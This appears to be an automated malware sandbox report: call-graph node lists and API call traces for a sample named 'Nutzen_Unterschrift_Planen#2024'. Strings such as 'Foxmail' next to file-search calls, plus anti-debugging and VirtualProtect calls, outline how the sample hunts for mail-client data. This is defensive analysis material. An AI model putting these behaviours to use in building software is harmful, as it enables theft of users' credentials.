7851 36f7ae2d 7849->7851 7855 36f7ae19 7849->7855 7852 36f76355 20 API 
calls 7850->7852 7853 36f76355 20 API calls 7851->7853 7854 36f7ade2 7852->7854 7856 36f7ae32 7853->7856 7857 36f76368 20 API calls 7854->7857 8036 36f7ada6 7855->8036 7859 36f76368 20 API calls 7856->7859 7860 36f7a070 7857->7860 7861 36f7ae3a 7859->7861 7860->7823 7860->7831 7862 36f762ac 26 API calls 7861->7862 7862->7860 7864 36f79a2e 7863->7864 7865 36f79a36 7864->7865 7866 36f79a4e 7864->7866 7888 36f76355 7865->7888 7868 36f79aec 7866->7868 7871 36f79a83 7866->7871 7870 36f76355 20 API calls 7868->7870 7872 36f79af1 7870->7872 7891 36f78c7b RtlEnterCriticalSection 7871->7891 7875 36f76368 20 API calls 7872->7875 7873 36f76368 20 API calls 7882 36f79a43 7873->7882 7877 36f79af9 7875->7877 7876 36f79a89 7878 36f79aa5 7876->7878 7879 36f79aba 7876->7879 7880 36f762ac 26 API calls 7877->7880 7881 36f76368 20 API calls 7878->7881 7892 36f79b0d 7879->7892 7880->7882 7884 36f79aaa 7881->7884 7882->7838 7886 36f76355 20 API calls 7884->7886 7885 36f79ab5 7943 36f79ae4 7885->7943 7886->7885 7889 36f75b7a 20 API calls 7888->7889 7890 36f7635a 7889->7890 7890->7873 7891->7876 7893 36f79b3b 7892->7893 7931 36f79b34 7892->7931 7894 36f79b3f 7893->7894 7895 36f79b5e 7893->7895 7897 36f76355 20 API calls 7894->7897 7898 36f79baf 7895->7898 7899 36f79b92 7895->7899 7896 36f72ada 5 API calls 7900 36f79d15 7896->7900 7901 36f79b44 7897->7901 7903 36f79bc5 7898->7903 7946 36f7a00b 7898->7946 7902 36f76355 20 API calls 7899->7902 7900->7885 7904 36f76368 20 API calls 7901->7904 7906 36f79b97 7902->7906 7949 36f796b2 7903->7949 7908 36f79b4b 7904->7908 7910 36f76368 20 API calls 7906->7910 7911 36f762ac 26 API calls 7908->7911 7914 36f79b9f 7910->7914 7911->7931 7912 36f79bd3 7915 36f79bd7 7912->7915 7916 36f79bf9 7912->7916 7913 36f79c0c 7918 36f79c66 WriteFile 7913->7918 7919 36f79c20 7913->7919 7917 36f762ac 26 API calls 7914->7917 7920 36f79ccd 7915->7920 7956 36f79645 7915->7956 7961 36f79492 GetConsoleCP 7916->7961 7917->7931 7922 36f79c89 GetLastError 7918->7922 7927 
36f79bef 7918->7927 7923 36f79c56 7919->7923 7924 36f79c28 7919->7924 7920->7931 7932 36f76368 20 API calls 7920->7932 7922->7927 7987 36f79728 7923->7987 7928 36f79c46 7924->7928 7929 36f79c2d 7924->7929 7927->7920 7927->7931 7935 36f79ca9 7927->7935 7979 36f798f5 7928->7979 7929->7920 7972 36f79807 7929->7972 7931->7896 7934 36f79cf2 7932->7934 7936 36f76355 20 API calls 7934->7936 7937 36f79cc4 7935->7937 7938 36f79cb0 7935->7938 7936->7931 7994 36f76332 7937->7994 7939 36f76368 20 API calls 7938->7939 7941 36f79cb5 7939->7941 7942 36f76355 20 API calls 7941->7942 7942->7931 8035 36f78c9e RtlLeaveCriticalSection 7943->8035 7945 36f79aea 7945->7882 7999 36f79f8d 7946->7999 8021 36f78dbc 7949->8021 7951 36f796c2 7952 36f796c7 7951->7952 7953 36f75af6 38 API calls 7951->7953 7952->7912 7952->7913 7954 36f796ea 7953->7954 7954->7952 7955 36f79708 GetConsoleMode 7954->7955 7955->7952 7959 36f7969f 7956->7959 7960 36f7966a 7956->7960 7957 36f796a1 GetLastError 7957->7959 7958 36f7a181 WriteConsoleW CreateFileW 7958->7960 7959->7927 7960->7957 7960->7958 7960->7959 7962 36f79607 7961->7962 7966 36f794f5 7961->7966 7963 36f72ada 5 API calls 7962->7963 7964 36f79641 7963->7964 7964->7927 7966->7962 7967 36f7957b WideCharToMultiByte 7966->7967 7968 36f779e6 40 API calls 7966->7968 7971 36f795d2 WriteFile 7966->7971 8030 36f77c19 7966->8030 7967->7962 7969 36f795a1 WriteFile 7967->7969 7968->7966 7969->7966 7970 36f7962a GetLastError 7969->7970 7970->7962 7971->7966 7971->7970 7976 36f79816 7972->7976 7973 36f798d8 7974 36f72ada 5 API calls 7973->7974 7978 36f798f1 7974->7978 7975 36f79894 WriteFile 7975->7976 7977 36f798da GetLastError 7975->7977 7976->7973 7976->7975 7977->7973 7978->7927 7986 36f79904 7979->7986 7980 36f79a0f 7981 36f72ada 5 API calls 7980->7981 7982 36f79a1e 7981->7982 7982->7927 7983 36f79986 WideCharToMultiByte 7984 36f79a07 GetLastError 7983->7984 7985 36f799bb WriteFile 7983->7985 7984->7980 7985->7984 7985->7986 7986->7980 7986->7983 7986->7985 
7988 36f79737 7987->7988 7989 36f797ea 7988->7989 7990 36f797a9 WriteFile 7988->7990 7991 36f72ada 5 API calls 7989->7991 7990->7988 7993 36f797ec GetLastError 7990->7993 7992 36f79803 7991->7992 7992->7927 7993->7989 7995 36f76355 20 API calls 7994->7995 7996 36f7633d 7995->7996 7997 36f76368 20 API calls 7996->7997 7998 36f76350 7997->7998 7998->7931 8008 36f78d52 7999->8008 8001 36f79f9f 8002 36f79fa7 8001->8002 8003 36f79fb8 SetFilePointerEx 8001->8003 8006 36f76368 20 API calls 8002->8006 8004 36f79fd0 GetLastError 8003->8004 8005 36f79fac 8003->8005 8007 36f76332 20 API calls 8004->8007 8005->7903 8006->8005 8007->8005 8009 36f78d74 8008->8009 8010 36f78d5f 8008->8010 8013 36f76355 20 API calls 8009->8013 8015 36f78d99 8009->8015 8011 36f76355 20 API calls 8010->8011 8012 36f78d64 8011->8012 8014 36f76368 20 API calls 8012->8014 8016 36f78da4 8013->8016 8018 36f78d6c 8014->8018 8015->8001 8017 36f76368 20 API calls 8016->8017 8019 36f78dac 8017->8019 8018->8001 8020 36f762ac 26 API calls 8019->8020 8020->8018 8022 36f78dd6 8021->8022 8023 36f78dc9 8021->8023 8025 36f76368 20 API calls 8022->8025 8027 36f78de2 8022->8027 8024 36f76368 20 API calls 8023->8024 8026 36f78dce 8024->8026 8028 36f78e03 8025->8028 8026->7951 8027->7951 8029 36f762ac 26 API calls 8028->8029 8029->8026 8031 36f75af6 38 API calls 8030->8031 8032 36f77c24 8031->8032 8033 36f77a00 38 API calls 8032->8033 8034 36f77c34 8033->8034 8034->7966 8035->7945 8039 36f7ad24 8036->8039 8038 36f7adca 8038->7860 8040 36f7ad30 8039->8040 8050 36f78c7b RtlEnterCriticalSection 8040->8050 8042 36f7ad3e 8043 36f7ad65 8042->8043 8044 36f7ad70 8042->8044 8051 36f7ae4d 8043->8051 8046 36f76368 20 API calls 8044->8046 8047 36f7ad6b 8046->8047 8066 36f7ad9a 8047->8066 8049 36f7ad8d 8049->8038 8050->8042 8052 36f78d52 26 API calls 8051->8052 8055 36f7ae5d 8052->8055 8053 36f7ae63 8069 36f78cc1 8053->8069 8055->8053 8057 36f78d52 26 API calls 8055->8057 8065 36f7ae95 8055->8065 8056 36f78d52 26 API calls 8058 
36f7aea1 CloseHandle 8056->8058 8061 36f7ae8c 8057->8061 8058->8053 8062 36f7aead GetLastError 8058->8062 8060 36f7aedd 8060->8047 8064 36f78d52 26 API calls 8061->8064 8062->8053 8063 36f76332 20 API calls 8063->8060 8064->8065 8065->8053 8065->8056 8078 36f78c9e RtlLeaveCriticalSection 8066->8078 8068 36f7ada4 8068->8049 8070 36f78d37 8069->8070 8071 36f78cd0 8069->8071 8072 36f76368 20 API calls 8070->8072 8071->8070 8076 36f78cfa 8071->8076 8073 36f78d3c 8072->8073 8074 36f76355 20 API calls 8073->8074 8075 36f78d27 8074->8075 8075->8060 8075->8063 8076->8075 8077 36f78d21 SetStdHandle 8076->8077 8077->8075 8078->8068 8079->7834 8080->7814

                                                            Control-flow Graph

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 36F71137
                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71151
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7115C
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7116D
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7117C
                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71193
                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 36F711D0
                                                            • FindClose.KERNEL32(00000000), ref: 36F711DB
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                            • String ID:
                                                            • API String ID: 1083526818-0
                                                            • Opcode ID: c23880beb78c2724208a342c6244fbfc0fc89bcb5800c37d24d0ca5a732a92d6
                                                            • Instruction ID: f0ef4f895534a66e6594d9752fed53de110b59ad752c88b06c358f9180f9594b
                                                            • Opcode Fuzzy Hash: c23880beb78c2724208a342c6244fbfc0fc89bcb5800c37d24d0ca5a732a92d6
                                                            • Instruction Fuzzy Hash: E921A2729043086BD720EA649C48F9B7B9CEF84354F140D2AFA58D31D4EB70D60987D6

                                                            Control-flow Graph

                                                            APIs
                                                            • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 36F71434
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 36F71137
                                                              • Part of subcall function 36F710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71151
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7115C
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7116D
                                                              • Part of subcall function 36F710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 36F7117C
                                                              • Part of subcall function 36F710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 36F71193
                                                              • Part of subcall function 36F710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 36F711D0
                                                              • Part of subcall function 36F710F1: FindClose.KERNEL32(00000000), ref: 36F711DB
                                                            • lstrlenW.KERNEL32(?), ref: 36F714C5
                                                            • lstrlenW.KERNEL32(?), ref: 36F714E0
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F7150F
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F71521
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F71547
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F71553
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F71579
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F71585
                                                            • lstrlenW.KERNEL32(?,?), ref: 36F715AB
                                                            • lstrcatW.KERNEL32(00000000), ref: 36F715B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                            • String ID: )$Foxmail$ProgramFiles
                                                            • API String ID: 672098462-2938083778
                                                            • Opcode ID: bff52676da5e8e1f4131ad18e8e2ec38317d778f5ee358cb0516a9c1d8a8c4e9
                                                            • Instruction ID: 8f9583fca2be4b2e0c7c7f569bde4c53e74c96a969512f8ca2645943ea38f186
                                                            • Opcode Fuzzy Hash: bff52676da5e8e1f4131ad18e8e2ec38317d778f5ee358cb0516a9c1d8a8c4e9
                                                            • Instruction Fuzzy Hash: BE81B271A00358A9DB20EBA0DC45FDE7B7DEF84750F0019D6F608E7190EA759A88CF99

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(36F7C7DD), ref: 36F7C7E6
                                                            • GetModuleHandleA.KERNEL32(?,36F7C7DD), ref: 36F7C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 36F7C860
                                                              • Part of subcall function 36F7C803: GetProcAddress.KERNEL32(00000000,36F7C7F4), ref: 36F7C804
                                                              • Part of subcall function 36F7C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C816
                                                              • Part of subcall function 36F7C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C82A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction ID: 1f531f5c29a994c810a52531c2651753c9c1767650c0f31314e625007b3bcceb
                                                            • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                            • Instruction Fuzzy Hash: 6D01F145D8D3513EBB1156B60C01ABA6F989F277E1B201F9BE040D71D3DAA0C506C3F6

                                                            Control-flow Graph

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,36F7C7DD), ref: 36F7C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 36F7C860
                                                              • Part of subcall function 36F7C7E6: GetModuleHandleA.KERNEL32(36F7C7DD), ref: 36F7C7E6
                                                              • Part of subcall function 36F7C7E6: GetProcAddress.KERNEL32(00000000,36F7C7F4), ref: 36F7C804
                                                              • Part of subcall function 36F7C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C816
                                                              • Part of subcall function 36F7C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C82A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                            • String ID:
                                                            • API String ID: 2099061454-0
                                                            • Opcode ID: a452ac0e578b87b9c125a1c15392c791f0f01602258e3eee6d5826f2a307e313
                                                            • Instruction ID: bc158e742099da9f40b6ab63634ad1ad4439fb5143446da144debae6271dde78
                                                            • Opcode Fuzzy Hash: a452ac0e578b87b9c125a1c15392c791f0f01602258e3eee6d5826f2a307e313
                                                            • Instruction Fuzzy Hash: CA21036685C3816FFB118BB54C04BA67FD99F173E0F294E9BD080DB183D6A88446C3E6

                                                            Control-flow Graph

                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,36F7C7F4), ref: 36F7C804
                                                            • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C816
                                                            • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,36F7C7F4,36F7C7DD), ref: 36F7C82A
                                                            • GetModuleHandleA.KERNEL32(?,36F7C7DD), ref: 36F7C838
                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 36F7C860
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProcProtectVirtual$HandleModule
                                                            • String ID:
                                                            • API String ID: 2152742572-0
                                                            • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction ID: 08d904ab02d6dd9c5b4aac3a40bac453f2e395280b9f6881c1925147f25f96db
                                                            • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                            • Instruction Fuzzy Hash: 01F0CD86A8D3503EFA1145B51C41EBA6FCC8F2B7E1B201E57E140C7183D9A58506C3F6
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 36F72645
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 36F72710
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 36F72730
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 36F7273A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: e22eb6243a1241bf3e9869905234b43709ecdd93280a076413928ef9c10da1cf
                                                            • Instruction ID: 99b09c98918d267a58ddea5ce856137b9792c9eec2f3c338e0523827c5528bcf
                                                            • Opcode Fuzzy Hash: e22eb6243a1241bf3e9869905234b43709ecdd93280a076413928ef9c10da1cf
                                                            • Instruction Fuzzy Hash: C9312A75D4521C9BDB10DFA5CD89BCDBBB8AF08344F1044AAE50DAB290EB709B86CF45
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 36F72276
                                                            • GetCurrentThreadId.KERNEL32 ref: 36F72285
                                                            • GetCurrentProcessId.KERNEL32 ref: 36F7228E
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 36F7229B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: c1f4208f7cd470364007cd10453e9e2214571a0f50b379f482296638be7a07e7
                                                            • Instruction ID: 7e2a208e128b673797900b8a95b188b62a4614708f4968032b32ee28fb5a43a2
                                                            • Opcode Fuzzy Hash: c1f4208f7cd470364007cd10453e9e2214571a0f50b379f482296638be7a07e7
                                                            • Instruction Fuzzy Hash: 60F05F71C10209EBCB00DBB4C549A9EBBF8FF18345F915499D512F7144E774AB069B91
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B21
                                                            • UnhandledExceptionFilter.KERNEL32(36F7D1DC,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B2A
                                                            • GetCurrentProcess.KERNEL32(C0000409,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B35
                                                            • TerminateProcess.KERNEL32(00000000,?,36F72C3B,36F7D1DC,00000017), ref: 36F72B3C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 3231755760-0
                                                            • Opcode ID: 037fa0339088ba5615a376a2c9cd7b7afb423f459b458019e0b6b1273fd964c0
                                                            • Instruction ID: 9e2b241c3447bb56734a678e462fa2341653ffc4d2e431ee3c892c060cded777
                                                            • Opcode Fuzzy Hash: 037fa0339088ba5615a376a2c9cd7b7afb423f459b458019e0b6b1273fd964c0
                                                            • Instruction Fuzzy Hash: 43D0EA72044208ABDA002BE1DD0DA993B2AAF08696F847410FB0AA645DDA759457CBA6
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 36F761DA
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 36F761E4
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 36F761F1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 61cc6abea2639b061cf80e9c5a1ea5d18f1a427ed3b6536366613ad51f06fac7
                                                            • Instruction ID: f8496fa8c98d4dfab8787258a5ca6817ece474e66419b1df553e5cc06b962f4b
                                                            • Opcode Fuzzy Hash: 61cc6abea2639b061cf80e9c5a1ea5d18f1a427ed3b6536366613ad51f06fac7
                                                            • Instruction Fuzzy Hash: 5B31D57490121CABCB21DF64D988B8DBBB4FF08350F5045DAE81CA7290E7309B91CF45
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000,00000001,36F72082,36F82108,0000000C,36F71F3A,?), ref: 36F74AD5
                                                            • TerminateProcess.KERNEL32(00000000,?,36F74A8A,?,36F82238,0000000C,36F74BBD,00000000,00000000,00000001,36F72082,36F82108,0000000C,36F71F3A,?), ref: 36F74ADC
                                                            • ExitProcess.KERNEL32 ref: 36F74AEE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 645f982e3e9057b66d4619edbcb6b069c3d7e1dc7921a29d79bef2b43ffadf2d
                                                            • Instruction ID: 4d6750532eab3580a65bc13e705878228e9df873bb18c31ca72893f82ac1086e
                                                            • Opcode Fuzzy Hash: 645f982e3e9057b66d4619edbcb6b069c3d7e1dc7921a29d79bef2b43ffadf2d
                                                            • Instruction Fuzzy Hash: C4E04636000608AFDF016F24CD08A493F2AFF403C1B906829FA449B168CB35EC43CAA5
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,36F7B5BC,?,?,00000008,?,?,36F7B25C,00000000), ref: 36F7B7EE
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: fa016078a628a33adf065a463057ec20ddf261732c10f45ae0ed05382e663ceb
                                                            • Instruction ID: a1a1ee7178d1273bf655548f503d5648846b132becb937972d35d8cc2e75f3ad
                                                            • Opcode Fuzzy Hash: fa016078a628a33adf065a463057ec20ddf261732c10f45ae0ed05382e663ceb
                                                            • Instruction Fuzzy Hash: A0B19F76510609CFE705CF29C486B947BF0FF063A5F658A99E899CF2A1C735E982CB40
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 36F7294C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321711375784.0000000036F86000.00000040.00001000.00020000.00000000.sdmp, Offset: 36F70000, based on PE: true
                                                            • Associated: 00000002.00000002.321711346396.0000000036F70000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000002.00000002.321711375784.0000000036F71000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_36f70000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.321687932538.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.321687903671.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687963130.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321687991478.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000002.00000002.321688063837.00000000007E3000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorModeVersionlstrlen
                                                            • String ID: NSIS Error$UXTHEME
                                                            • API String ID: 758611499-110662866

                                                            Control-flow Graph

                                                            APIs
